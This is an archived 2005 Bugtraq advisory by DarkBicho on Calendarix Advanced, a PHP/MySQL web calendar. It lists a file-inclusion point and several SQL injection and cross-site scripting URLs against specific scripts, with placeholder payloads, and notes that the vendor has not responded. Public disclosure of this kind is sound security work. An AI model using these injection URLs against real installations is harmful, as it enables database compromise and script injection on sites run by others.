multiple vulnerability Calendarix Advanced
From: DarkBicho (darkbicho_at_gmail.com)
Date: 05/31/05
- Previous message: Ow Mun Heng: "Re: [XNUXER-SECURITY] Root Privilige Escalation in Sudo version 1.6.8p7 without Password, SuSE 9.3"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Tue, 31 May 2005 12:22:16 -0500 To: bugtraq@securityfocus.com
/***********************************************
* Advisorie : 01-0005-15
* title: multiple vulnerability
* Software: Calendarix Advanced
* Date: 28. April 2005
* Web: http://www.calendarix.com/
************************************************/
- Affected software description:
Webcalendar is a web software write in php y mysql
- Expoit:
Include
line 16
admin/cal_admintop.php:include_once ($calpath."cal_utils.php");
xss and sql injection
line 122 - 160
cal_day.php?op=day&date=2005-05-03&catview=1[sql]/*
cal_pophols.php?id=999'[sql]/*
line 23
calendar.php?op=cal&month=5&year=2'%3Ch1%3DarkBicho005&catview=1
line 194 - 196
cal_week.php?op=week&catview= 999'[sql]/*
line 34 - 39
cal_cat.php?op=cats&catview=999'[sql]*/
- How to fix:
Vendor no responds
- Credits:
DarkBicho
Email: darkbicho@gmail.com
Web: http://www.swp-scene.org
- Grettings:
"A mi Team SWP"
" Viva el Peru Carajo"
-- - - - - - - - - - - - - - - - - - - - - - - - - - Miguel Sumaran (DarkBicho) webpage: http://www.darkbicho.tk/ Team : http://www.swp-scene.org/ Made in Peru - - - - - - - - - - - - - - - - - - - - - - - - -
- Previous message: Ow Mun Heng: "Re: [XNUXER-SECURITY] Root Privilige Escalation in Sudo version 1.6.8p7 without Password, SuSE 9.3"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
